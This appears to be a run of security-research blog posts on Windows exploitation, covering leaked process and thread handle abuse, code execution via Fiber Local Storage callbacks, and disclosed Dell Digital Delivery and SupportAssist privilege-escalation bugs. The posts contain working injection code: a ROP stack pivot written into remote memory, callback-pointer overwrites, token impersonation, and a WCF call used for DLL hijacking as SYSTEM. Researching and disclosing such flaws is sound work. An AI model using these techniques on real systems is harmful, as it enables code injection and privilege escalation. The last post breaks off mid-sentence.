In addition, as per the FLS article, we also need to take control over ECX/RCX. This will allow us to stack pivot and continue executing our ROP payload. This requires that we update the TEB->FlsData entry which we also are unable to do, since it’s a pointer. Much like FlsCallback, though, I was able to just overwrite this value and craft my own data structure, which also turned out to be pretty simple. The TLS buffer ended up looking like this:

1
2
3
4
5
//
// 0  ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] 41414141 41414141 41414141 41414141 
//

There just so happens to be a perfect stack pivot gadget located in kernelbase!SwitchToFiberContext (or kernel32!SwitchToFiber on Windows 7):

1
2
7603c415 8ba1d8000000    mov     esp,dword ptr [ecx+0D8h]
7603c41b c20400          ret     4

Putting this all together, execution results in:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c415 esp=0019fd6c ebp=0019fd84 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
kernel32!SwitchToFiber+0x115:
7603c415 8ba1d8000000    mov     esp,dword ptr [ecx+0D8h]
ds:0023:7ffdee2c=7ffdee30
0:000> p
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c41b esp=7ffdee30 ebp=0019fd84 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
kernel32!SwitchToFiber+0x11b:
7603c41b c20400          ret     4
0:000> dd esp l3
7ffdee30  41414141 41414141 41414141

Now we’ve got EIP and a stack pivot. Instead of marking memory and executing some other payload, I took a quick and lazy strategy and simply called LoadLibraryA to load a DLL off disk from an arbitrary location. This works well, is reliable, and even on process exit will execute and block, depending on what you do within the DLL. Here’s the final code to achieve all this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
_NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll"), "NtWriteVirtualMemory");

LPVOID lpBuf = malloc(13*sizeof(SIZE_T));
HANDLE hProcess = OpenProcess(PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, FALSE, dwTargetPid);
if (hProcess == NULL)
    return;

SIZE_T LoadLibA = (SIZE_T)LoadLibraryA;
SIZE_T RemoteTeb = GetRemoteTeb(hProcess), TlsAddr = 0;
TlsAddr = RemoteTeb + 0xe10;

SIZE_T RemotePeb = GetRemotePeb(hProcess);
SIZE_T PivotGadget = 0x7603c415;
SIZE_T StackAddress = (TlsAddr + 28) - 0xd8;
SIZE_T RtlExitThread = (SIZE_T)GetProcAddress(GetModuleHandleA("ntdll"), "RtlExitUserThread");
SIZE_T LoadLibParam = (SIZE_T)TlsAddr + 48;

//
// construct our TlsSlots payload:
// 0  ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] [LOADLIB ADDR] 41414141 [RET ADDR] [LOADLIB ARG PTR]
// 48 ] 41414141
//

memset(lpBuf, 0x0, 16);
*((DWORD*)lpBuf + 2) = PivotGadget;
*((DWORD*)lpBuf+ 4) = 0;
*((DWORD*)lpBuf + 5) = 0;
*((DWORD*)lpBuf + 6) = StackAddress;

StackAddress = TlsAddr + 32;
*((DWORD*)lpBuf + 7) = StackAddress;
*((DWORD*)lpBuf + 8) = LoadLibA;
*((DWORD*)lpBuf + 9) = 0x41414141; // junk
*((DWORD*)lpBuf + 10) = RtlExitThread;
*((DWORD*)lpBuf + 11) = (SIZE_T)TlsAddr + 48;
*((DWORD*)lpBuf + 12) = 0x41414141; // DLL name (AAAA.dll)

NtWriteVirtualMemory(hProcess, (PVOID)TlsAddr, lpBuf, (13 * sizeof(SIZE_T)), NULL);

// update FlsCallback in PEB and FlsData in TEB
StackAddress = TlsAddr + 12;
NtWriteVirtualMemory(hProcess, (LPVOID)(RemoteTeb + 0xfb4), (PVOID)&StackAddress, sizeof(SIZE_T), NULL);
NtWriteVirtualMemory(hProcess, (LPVOID)(RemotePeb + 0x20c), (PVOID)&TlsAddr, sizeof(SIZE_T), NULL);

If all works well you should see attempts to load AAAA.dll off disk when the callback is executed (just close the process). As a note, we’re using NtWriteVirtualMemory here because WriteProcessMemory requires PROCESS_VM_OPERATION which we may not have.

Another variation of this access might be PROCESS_VM_WRITE|PROCESS_VM_READ. This gives us visibility into the address space, but we still cannot allocate or map memory into the remote process. Using the above strategy we can rid ourselves of the PROCESS_QUERY_INFORMATION requirement and simply read the PEB address out of TEB.

Finally, consider PROCESS_VM_WRITE|PROCESS_VM_READ|PROCESS_VM_OPERATION. Granting us PROCESS_VM_OPERATION loosens the restrictions quite a bit, as we can now allocate memory and change page permissions. This allows us to more easily use the above strategy, but also perform inline and IAT hooks.

Thread

As with the process handles, there are a handful of access rights we can dismiss immediately:

1
2
3
4
5
6
SYNCHRONIZE
THREAD_QUERY_INFORMATION
THREAD_GET_CONTEXT
THREAD_QUERY_LIMITED_INFORMATION
THREAD_SUSPEND_RESUME
THREAD_TERMINATE

Which leaves the following:

1
2
3
4
5
6
7
THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_IMPERSONATE
THREAD_SET_CONTEXT
THREAD_SET_INFORMATION
THREAD_SET_LIMITED_INFORMATION
THREAD_SET_THREAD_TOKEN

THREAD_ALL_ACCESS

There’s quite a lot we can do with this, including everything described in the following thread access rights sections. I personally find the THREAD_DIRECT_IMPERSONATION strategy to be the easiest.

There is another option that is a bit more arcane, but equally viable. Note that this thread access doesn’t give us VM read/write privileges, so there’s no easy to way to “write” into a thread, since that doesn’t really make sense. What we do have, however, is a series of APIs that sort of grant us that: SetThreadContext[4] and GetThreadContext[5]. About a decade ago a code injection technique dubbed Ghostwriting[6] was released to little fanfare. In it, the author describes a code injection strategy that does not require the typical win32 API calls; there’s no WriteProcessMemory, NtMapViewOfSection, or even OpenProcess.

While the write-up is lacking in a few departments, it’s quite a clever bit of code. In short, the author abuses the SetThreadContext/GetThreadContext calls in tandem with a set of specific assembly gadgets to write a payload, dword by dword, onto the threads stack. Once written, they use NtProtectVirtualMemoryAddress to mark the code RWX and redirect code flow to their payload.

For their write gadget, they hunt for a pattern inside NTDLL:

1
2
MOV [REG1], REG2
RET

They then locate a JMP $, or jump here, which will operate as an auto lock and infinitely loop. Once we’ve found our two gadgets, we suspend the thread. We update its RIP to point to the MOV gadget, set our REG1 to an adjusted RSP so the return address is the JMP $, and set REG2 to the jump gadget. Here’s my write function:

1
2
3
4
5
6
7
8
9
10
void WriteQword(CONTEXT context, HANDLE hThread, size_t WriteWhat, size_t WriteWhere)
{
    SetContextRegister(&context, g_rside, WriteWhat);
    SetContextRegister(&context, g_lside, WriteWhere);

    context.Rsp = StackBase;
    context.Rip = MovAddr;

    WaitForThreadAutoLock(hThread, &context, JmpAddr);
}

The SetContextRegister call simply assigns REG1 and REG2 in our gadget to the appropriate registers. Once those are set, we set our stack base (adjusted from threads RSP) and update RIP to our gadget. The first time we execute this we’ll write our JMP $ gadget to the stack.

They use what they call a thread auto lock to control execution flow (edits mine):

1
2
3
4
5
6
7
8
9
10
11
12
13
void WaitForThreadAutoLock(HANDLE Thread, CONTEXT* PThreadContext,HWND ThreadsWindow,DWORD AutoLockTargetEIP)
{
    SetThreadContext(Thread,PThreadContext);

    do
    {
        ResumeThread(Thread);
        Sleep(30); 
        SuspendThread(Thread);
        GetThreadContext(Thread,PThreadContext);
    }
    while(PThreadContext->Eip!=AutoLockTargetEIP);
}

It’s really just a dumb waiter that allows the thread to execute a little bit each run before checking if the “sink” gadget has been reached.

Once our execution hits the jump, we have our write primitive. We can now simply adjust RIP back to the MOV gadget, update RSP, and set REG1 and REG2 to any values we want.

I ported the core function of this technique to x64 to demonstrate its viability. Instead of using it to execute an entire payload, I simply execute LoadLibraryA to load in an arbitrary DLL at an arbitrary path. The code is available on Github[11]. Turning it into something production ready is left as an exercise for the reader ;)

Additionally, while attending Blackhat 2019, I saw a process injection talk by the SafeBreach Labs group. They’ve release a code injection tool that contains an x64 implementation of GhostWriting[10]. While I haven’t personally evaluated it, it’s probably more production ready and usable than mine.

THREAD_DIRECT_IMPERSONATION

This differs from THREAD_IMPERSONATE in that it allows the thread token to be impersonated, not simply TO impersonate. Exploiting this is simply a matter of using the NtImpersonateThread[8] API, as pointed out by James Forshaw[0][7]. Using this we’re able to create a thread totally under our control and impersonate the privileged one:

1
2
hNewThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpRtl, 0, CREATE_SUSPENDED, &dwTid);
NtImpersonateThread(hNewThread, hThread, &sqos);

The hNewThread will now be executing with a SYSTEM token, allowing us to do whatever we need under the privileged impersonation context.

THREAD_IMPERSONATE

Unfortunately I was unable to identify a surefire, generic method for exploiting this one. We have no ability to query the remote thread, nor can we gain any control over its execution flow. We’re simply allowed to manage its impersonation state.

We can use this to force the privileged thread to impersonate us, using the NtImpersonateThread call, which may unlock additional logic bugs in the application. For example, if the service were to create shared resources under a user context for which it would typically be SYSTEM, such as a file, we can gain ownership over that file. If multiple privileged threads access it for information (such as configuration) it could lead to code execution.

THREAD_SET_CONTEXT

While this right grants us access to SetThreadContext, it also conveniently allows us to use QueueUserAPC. This is effectively granting us a CreateRemoteThread primitive with caveat. For an APC to be processed by the thread, it needs to enter an alertable state. This happens when a specific set of win32 functions are executed, so it is entirely possible that the thread never becomes alertable.

If we’re working with an uncooperative thread, SetThreadContext comes in handy. Using it, we can force the thread to become alertable via the NtTestAlert function. Of course, we have no ability to call GetThreadContext and will therefore likely lose control of the thread after exploitation.

In combination with THREAD_GET_CONTEXT, this right would allow us to replicate the Ghostwriting code injection technique discussed in the THREAD_ALL_ACCESS section above.

THREAD_SET_INFORMATION

Needed to set various ThreadInformationClass[9] values on a thread, usually via NtSetInformationThread. After looking through all of these, I did not identify any immediate ways in which we could influence the remote thread. Some of the values are interesting but unusuable (ThreadSetTlsArrayAddress, ThreadAttachContainer, etc) and are either not implemented/removed or require SeDebugPrivilege or similar.

I’m not really sure what would make this a viable candidate either. There’s really not a lot of juicy stuff that can be done via the available functions

THREAD_SET_LIMITED_INFORMATION

This allows the caller to set a subset of THREAD_INFORMATION_CLASS values, namely: ThreadPriority, ThreadPriorityBoost, ThreadAffinityMask, ThreadSelectedCpuSets, and ThreadNameInformation. None of these get us anywhere near an exploitable primitive.

THREAD_SET_THREAD_TOKEN

Similar to THREAD_IMPERSONATE, I was unable to find a direct and generic method of abusing this right. I can set the thread’s token or modify a few fields (via SetTokenInformation), but this doesn’t grant us much.

Conclusion

I was a little disappointed in how uneventful thread rights seemed to be. Almost half of them proved to be unexploitable on their own, and even in combination did not turn much up. As per above, having one of the following three privileges is necessary to turn a leaked thread handle into something exploitable:

1
2
3
THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_SET_CONTEXT

Missing these will require a deeper understanding of your target and some creativity.

Similarly, processes have a specific subset of rights that are directly exploitable:

1
2
3
4
5
PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_VM_WRITE

Barring these, more creativity is required.

References

[0]https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html
[1]https://googleprojectzero.blogspot.com/2018/05/bypassing-mitigations-by-attacking-jit.html
[2]https://d4stiny.github.io/Local-Privilege-Escalation-on-most-Dell-computers/
[3]https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
[4]https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext
[5]https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getthreadcontext
[6]http://blog.txipinet.com/2007/04/05/69-a-paradox-writing-to-another-process-without-openning-it-nor-actually-writing-to-it/
[7]https://tyranidslair.blogspot.com/2017/08/the-art-of-becoming-trustedinstaller.html
[8]https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtImpersonateThread.html
[9]https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/master/NtApiDotNet/NtThreadNative.cs#L51
[10]https://github.com/SafeBreach-Labs/pinjectra
[11]https://gist.github.com/hatRiot/aa77f007601be75684b95fe7ba978079
[12]http://www.hexacorn.com/blog/category/code-injection/
[13]http://hatriot.github.io/blog/2019/08/12/code-execution-via-fiber-local-storage
[14]http://www.nynaeve.net/?p=180
[15]https://github.com/processhacker/processhacker/blob/master/phnt/include/ntpsapi.h#L98

Code Execution via Fiber Local Storage

12 August 2019 at 21:10

While working on another research project (post to be released soon, will update here), I stumbled onto a very Hexacorn[0] inspired type of code injection technique that fit my situation perfectly. Instead of tainting the other post with its description and code, I figured I’d release a separate post describing it here.

When I say that it’s Hexacorn inspired, I mean that the bulk of the strategy is similar to everything else you’ve probably seen; we open a handle to the remote process, allocate some memory, and copy our shellcode into it. At this point we simply need to gain control over execution flow; this is where most of Hexacorn’s techniques come in handy. PROPagate via window properties, WordWarping via rich edit controls, DnsQuery via code pointers, etc. Another great example is Windows Notification Facility via user subscription callbacks (at least in modexp’s proof of concept), though this one isn’t Hexacorns.

These strategies are also predicated on the process having certain capabilities (DDE, private clipboards, WNF subscriptions), but more importantly, most, if not all, do not work across sessions or integrity levels. This is obvious and expected and frankly quite niche, but in my situation, a requirement.

Fibers

Fibers are “a unit of execution that must be manually scheduled by the application”[1]. They are essentially register and stack states that can be swapped in and out at will, and reflect upon the thread in which they are executing. A single thread can be running at most a single fiber at a time, but fibers can be hot swapped during execution and their quantum user controlled.

Fibers can also create and use fiber data. A pointer to this is stored in TEB->NtTib.FiberData and is a per-thread structure. This is initially set during a call to ConvertThreadToFiber. Taking a quick look at this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
void TestFiber()
{
    PVOID lpFiberData = HeapAlloc(GetProcessHeap(), 0, 0x10);
    PVOID lpFirstFiber = NULL;
    memset(lpFiberData, 0x41, 0x10);

    lpFirstFiber = ConvertThreadToFiber(lpFiberData);
    DebugBreak();
}

int main()
{
    DWORD tid = 0;
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)TestFiber, 0, 0, &tid);
    WaitForSingleObject(hThread, INFINITE);
    return 0;
}

We need to spawn off the test in a new thread, as the main thread will always have a fiber instantiated and the call will fail. If we run this in a debugger we can inspect the data after the break:

1
2
3
4
5
6
7
8
9
0:000> ~
.  0  Id: 1674.1160 Suspend: 1 Teb: 7ffde000 Unfrozen
#  1  Id: 1674.c78 Suspend: 1 Teb: 7ffdd000 Unfrozen
0:000> dt _NT_TIB 7ffdd000 FiberData
ucrtbased!_NT_TIB
   +0x010 FiberData : 0x002ea9c0 Void
0:000> dd poi(0x002ea9c0) l5
002ea998  41414141 41414141 41414141 41414141
002ea9a8  abababab

In addition to fiber data, fibers also have access to the fiber local storage (FLS). For all intents and purposes, this is identical to thread local storage (TLS)[2]. This allows all thread fibers access to shared data via a global index. The API for this is pretty simple, and very similar to TLS. In the following sample, we’ll allocate an index and toss some values in it. Using our previous example as base:

1
2
3
4
lpFirstFiber = ConvertThreadToFiber(lpFiberData);
dwIdx = FlsAlloc(NULL);
FlsSetValue(dwIdx, lpFiberData);
DebugBreak();

A pointer to this data is stored in the thread’s TEB, and can be extracted from TEB->FlsData. From the above example, assume the returned FLS index for this data is 6:

1
2
3
4
5
6
7
8
9
0:001> ~
   0  Id: 15f0.a10 Suspend: 1 Teb: 7ffdf000 Unfrozen
.  1  Id: 15f0.c30 Suspend: 1 Teb: 7ffde000 Unfrozen
0:001> dt _TEB 7ffde000 FlsData
ntdll!_TEB
   +0xfb4 FlsData : 0x0049a008 Void
0:001> dd poi(0x0049a008+(4*8))
0049a998  41414141 41414141 41414141 41414141
0049a9a8  abababab

Note that the offset is always the index + 2.

Abusing FLS Callbacks to Obtain Execution Control

Let’s return to that FlsAlloc call from the above example. Its first parameter is a PFLS_CALLBACK_FUNCTION[3] and is used for, according to MSDN:

1
2
3
4
An application-defined function. If the FLS slot is in use, FlsCallback is
called on fiber deletion, thread exit, and when an FLS index is freed. Specify
this function when calling the FlsAlloc function. The PFLS_CALLBACK_FUNCTION
type defines a pointer to this callback function. 

Well isn’t that lovely. These callbacks are stored process wide in PEB->FlsCallback. Let’s try it out:

1
dwIdx = FlsAlloc((PFLS_CALLBACK_FUNCTION)0x41414141);

And fetching it (assuming again an index of 6):

1
2
3
4
5
0:001> dt _PEB 7ffd8000 FlsCallback
ucrtbased!_PEB
   +0x20c FlsCallback : 0x002d51f8 _FLS_CALLBACK_INFO
0:001> dd 0x002d51f8 + (2 * 6 * 4) l1
002d5228  41414141

What happens when we let this run to process exit?

1
2
3
4
5
6
7
8
0:001> g
(10a8.1328): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd8000 ecx=002da998 edx=002d522c esi=00000006 edi=002da028
eip=41414141 esp=0051f71c ebp=0051f734 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
41414141 ??              ???

Recall the MSDN comment about when the FLS callback is invoked: ..on fiber deletion, thread exit, and when an FLS index is freed. This means that worst case our code executes once the process exits and best case following a threads exit or call to FlsFree. It’s worth reiterating that the primary thread for each process will have a fiber instantiated already; it’s quite possible that this thread isn’t around anymore, but this doesn’t matter as the callbacks are at the process level.

Another salient point here is the first parameter to the callback function. This parameter is the value of whatever was in the indexed slot and is also stashed in ECX/RCX before invoking the callback:

1
2
3
dwIdx = FlsAlloc((PFLS_CALLBACK_FUNCTION)0x41414141);
FlsSetValue(dwIdx, (PVOID)0x42424242);
DebugBreak();

Which, when executed:

1
2
3
4
5
6
7
(aa8.169c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd9000 ecx=42424242 edx=003c522c esi=00000006 edi=003ca028
eip=41414141 esp=006ef9c0 ebp=006ef9d8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
41414141 ??              ???

Under specific circumstances, this can be quite useful.

Anyway, PoC||GTFO, I’ve included some code below. In it, we overwrite the msvcrt!_freefls call used to free the FLS buffer.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#ifdef _WIN64
#define FlsCallbackOffset 0x320
#else
#define FlsCallbackOffset 0x20c
#endif

void OverwriteFlsCallback(LPVOID dwNewAddr, HANDLE hProcess) 
{
    _NtQueryInformationProcess NtQueryInformationProcess = (_NtQueryInformationProcess)GetProcAddress(GetModuleHandleA("ntdll"), 
                                                            "NtQueryInformationProcess");
    const char *payload = "\xcc\xcc\xcc\xcc";
    PROCESS_BASIC_INFORMATION pbi;
    SIZE_T sCallback = 0, sRetLen = 0;
    LPVOID lpBuf = NULL;

    //
    // allocate memory and write in our payload as one would normally do
    //

    lpBuf = VirtualAllocEx(hProcess, NULL, sizeof(SIZE_T), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, lpBuf, payload, sizeof(SIZE_T), NULL);

    // now we need to fetch the remote process PEB
    NtQueryInformationProcess(hProcess, PROCESSINFOCLASS(0), &pbi,
                              sizeof(PROCESS_BASIC_INFORMATION), NULL);

    // read the FlsCallback address out of it
    ReadProcessMemory(hProcess, (LPVOID)(((SIZE_T)pbi.PebBaseAddress) + FlsCallbackOffset), 
                          (LPVOID)&sCallback, sizeof(SIZE_T), &sRetLen);
    sCallback += 2 * sizeof(SIZE_T);

    // we're targeting the _freefls call, so overwrite that with our payload
    // address 
    WriteProcessMemory(hProcess, (LPVOID)sCallback, &dwNewAddr, sizeof(SIZE_T), &sRetLen);
}

I tested this on an updated Windows 10 x64 against notepad and mspaint; on process exit, the callback is executed and we gain control over execution flow. Pretty useful in the end; more on this soon…

References

[0] http://www.hexacorn.com
[1] https://docs.microsoft.com/en-us/windows/win32/procthread/fibers
[2] https://docs.microsoft.com/en-us/windows/win32/procthread/thread-local-storage
[3] https://docs.microsoft.com/en-us/windows/win32/api/winnt/nc-winnt-pfls_callback_function

Dell Digital Delivery - CVE-2018-11072 - Local Privilege Escalation

22 August 2018 at 21:10

Back in March or April I began reversing a slew of Dell applications installed on a laptop I had. Many of them had privileged services or processes running and seemed to perform a lot of different complex actions. I previously disclosed a LPE in SupportAssist[0], and identified another in their Digital Delivery platform. This post will detail a Digital Delivery vulnerability and how it can be exploited. This was privately discovered and disclosed, and no known active exploits are in the wild. Dell has issued a security advisory for this issue, which can be found here[4].

I’ll have another follow-up post detailing the internals of this application and a few others to provide any future researchers with a starting point. Both applications are rather complex and expose a large attack surface. If you’re interested in bug hunting LPEs in large C#/C++ applications, it’s a fine place to begin.

Dell’s Digital Delivery[1] is a platform for buying and installing system software. It allows users to purchase or manage software packages and reinstall them as necessary. Once again, it comes “..preinstalled on most Dell systems.”[1]

Bug

The Digital Delivery service runs as SYSTEM under the name DeliveryService, which runs the DeliveryService.exe binary. A userland binary, DeliveryTray.exe, is the user-facing component that allows users to view installed applications or reinstall previously purchased ones.

Communication from DeliveryTray to DeliveryService is performed via a Windows Communication Foundation (WCF) named pipe. If you’re unfamiliar with WCF, it’s essentially a standard methodology for exchanging data between two endpoints[2]. It allows a service to register a processing endpoint and expose functionality, similar to a web server with a REST API.

For those following along at home, you can find the initialization of the WCF pipe in Dell.ClientFulfillmentService.Controller.Initialize:

1
2
3
this._host = WcfServiceUtil.StandupServiceHost(typeof(UiWcfSession),
                                typeof(IClientFulfillmentPipeService),
                                "DDDService");

This invokes Dell.NamedPipe.StandupServiceHost:

1
2
3
4
5
6
7
8
9
10
11
12
13
ServiceHost host = null;
string apiUrl = "net.pipe://localhost/DDDService/IClientFulfillmentPipeService";
Uri realUri = new Uri("net.pipe://localhost/" + Guid.NewGuid().ToString());
Tryblock.Run(delegate
{
  host = new ServiceHost(classType, new Uri[]
  {
    realUri
  });
  host.AddServiceEndpoint(interfaceType, WcfServiceUtil.CreateDefaultBinding(), string.Empty);
  host.Open();
}, null, null);
AuthenticationManager.Singleton.RegisterEndpoint(apiUrl, realUri.AbsoluteUri);

The endpoint is thus registered and listening and the AuthenticationManager singleton is responsible for handling requests. Once a request comes in, the AuthenticationManager passes this off to the AuthPipeWorker function which, among other things, performs the following authentication:

1
2
3
4
5
string execuableByProcessId = AuthenticationManager.GetExecuableByProcessId(processId);
bool flag2 = !FileUtils.IsSignedByDell(execuableByProcessId);
if (!flag2)
{
    ...

If the process on the other end of the request is backed by a signed Dell binary, the request is allowed and a connection may be established. If not, the request is denied.

I noticed that this is new behavior, added sometime between 3.1 (my original testing) and 3.5 (latest version at the time, 3.5.1001.0), so I assume Dell is aware of this as a potential attack vector. Unfortunately, this is an inadequate mitigation to sufficiently protect the endpoint. I was able to get around this by simply spawning an executable signed by Dell (DeliveryTray.exe, for example) and injecting code into it. Once code is injected, the WCF API exposed by the privileged service is accessible.

The endpoint service itself is implemented by Dell.NamedPipe, and exposes a dozen or so different functions. Those include:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
ArchiveAndResetSettings
EnableEntitlements
EnableEntitlementsAsync
GetAppSetting
PingTrayApp
PollEntitlementService
RebootMachine
ReInstallEntitlement
ResumeAllOperations
SetAppSetting
SetAppState
SetEntitlementList
SetUserDownloadChoice
SetWallpaper
ShowBalloonTip
ShutDownApp
UpdateEntitlementUiState

Digital Delivery calls application install packages “entitlements”, so the references to installation/reinstallation are specific to those packages either available or presently installed.

One of the first functions I investigated was ReInstallEntitlement, which allows one to initiate a reinstallation process of an installed entitlement. This code performs the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
private static void ReInstallEntitlementThreadStart(object reInstallArgs)
{
    PipeServiceClient.ReInstallArgs ra = (PipeServiceClient.ReInstallArgs)reInstallArgs;
    PipeServiceClient.TryWcfCall(delegate
    {
        PipeServiceClient._commChannel.ReInstall(ra.EntitlementId, ra.RunAsUser);
    }, string.Concat(new object[]
    {
        "ReInstall ",
        ra.EntitlementId,
        " ",
        ra.RunAsUser.ToString()
    }));
}

This builds the arguments from the request and invokes a WCF call, which is sent to the WCF endpoint. The ReInstallEntitlement call takes two arguments: an entitlement ID and a RunAsUser flag. These are both controlled by the caller.

On the server side, Dell.ClientFulfillmentService.Controller handles implementation of these functions, and OnReInstall handles the entitlement reinstallation process. It does a couple sanity checks, validates the package signature, and hits the InstallationManager to queue the install request. The InstallationManager has a job queue and background thread (WorkingThread) that occasionally polls for new jobs and, when it receives the install job, kicks off InstallSoftware.

Because we’re reinstalling an entitlement, the package is cached to disk and ready to be installed. I’m going to gloss over a few installation steps here because it’s frankly standard and menial.

The installation packages are located in C:\ProgramData\Dell\DigitalDelivery\Downloads\Software\ and are first unzipped, followed by an installation of the software. In my case, I was triggering the installation of Dell Data Protection - Security Tools v1.9.1, and if you follow along in procmon, you’ll see it startup an install process:

1
2
3
"C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _
Security Tools v1.9.1\STSetup.exe" -y -gm2 /S /z"\"CIRRUS_INSTALL,
SUPPRESSREBOOT=1\""

The run user for this process is determined by the controllable RunAsUser flag and, if set to False, runs as SYSTEM out of the %ProgramData% directory.

During process launch of the STSetup process, I noticed the following in procmon:

1
2
3
4
5
6
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\VERSION.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\UxTheme.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\PROPSYS.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\apphelp.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\Secur32.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\api-ms-win-downlevel-advapi32-l2-1-0.dll

Of interest here is that the parent directory, %ProgramData%\Dell\Digital Delivery\Downloads\Software is not writable by any system user, but the entitlement package folders, Dell Data Protection - Security Tools in this case, is.

This allows non-privileged users to drop arbitrary files into this directory, granting us a DLL hijacking opportunity.

Exploitation

Exploiting this requires several steps:

  1. Drop a DLL under the appropriate %ProgramData% software package directory
  2. Launch a new process running an executable signed by Dell
  3. Inject C# into this process (which is running unprivileged in userland)
  4. Connect to the WCF named pipe from within the injected process
  5. Trigger ReInstallEntitlement

Steps 4 and 5 can be performed using the following:

1
2
3
4
5
6
7
8
9
10
11
PipeServiceClient client = new PipeServiceClient();
client.Initialize();

while (PipeServiceClient.AppState == AppState.Initializing)
  System.Threading.Thread.Sleep(1000);

EntitlementUiWrapper entitle = PipeServiceClient.EntitlementList[0];
PipeServiceClient.ReInstallEntitlement(entitle.ID, false);
System.Threading.Thread.Sleep(30000);

PipeServiceClient.CloseConnection();

The classes used above are imported from NamedPipe.dll. Note that we’re simply choosing the first entitlement available and reinstalling it. You may need to iterate over entitlements to identify the correct package pointing to where you dropped your DLL.

I’ve provided a PoC on my Github here[3], and Dell has additionally released a security advisory, which can be found here[4].

Timeline

05/24/18 – Vulnerability initially reported
05/30/18 – Dell requests further information
06/26/18 – Dell provides update on review and remediation
07/06/18 – Dell provides internal tracking ID and update on progress
07/24/18 – Update request
07/30/18 – Dell confirms they will issue a security advisory and associated CVE
08/07/18 – 90 day disclosure reminder provided
08/10/18 – Dell confirms 8/22 disclosure date alignment
08/22/18 – Public disclosure

References

[0] http://hatriot.github.io/blog/2018/05/17/dell-supportassist-local-privilege-escalation/
[1] https://www.dell.com/learn/us/en/04/flatcontentg/dell-digital-delivery
[2] https://docs.microsoft.com/en-us/dotnet/framework/wcf/whats-wcf
[3] https://github.com/hatRiot/bugs
[4] https://www.dell.com/support/article/us/en/04/SLN313559

Dell SupportAssist Driver - Local Privilege Escalation

18 May 2018 at 04:00

This post details a local privilege escalation (LPE) vulnerability I found in Dell’s SupportAssist[0] tool. The bug is in a kernel driver loaded by the tool, and is pretty similar to bugs found by ReWolf in ntiolib.sys/winio.sys[1], and those found by others in ASMMAP/ASMMAP64[2]. These bugs are pretty interesting because they can be used to bypass driver signature enforcement (DSE) ad infinitum, or at least until they’re no longer compatible with newer operating systems.

Dell’s SupportAssist is, according to the site, “(..) now preinstalled on most of all new Dell devices running Windows operating system (..)”. It’s primary purpose is to troubleshoot issues and provide support capabilities both to the user and to Dell. There’s quite a lot of functionality in this software itself, which I spent quite a bit of time reversing and may blog about at a later date.

Bug

Calling this a “bug” is really a misnomer; the driver exposes this functionality eagerly. It actually exposes a lot of functionality, much like some of the previously mentioned drivers. It provides capabilities for reading and writing the model-specific register (MSR), resetting the 1394 bus, and reading/writing CMOS.

The driver is first loaded when the SupportAssist tool is launched, and the filename is pcdsrvc_x64.pkms on x64 and pcdsrvc.pkms on x86. Incidentally, this driver isn’t actually even built by Dell, but rather another company, PC-Doctor[3]. This company provides “system health solutions” to a variety of companies, including Dell, Intel, Yokogawa, IBM, and others. Therefore, it’s highly likely that this driver can be found in a variety of other products…

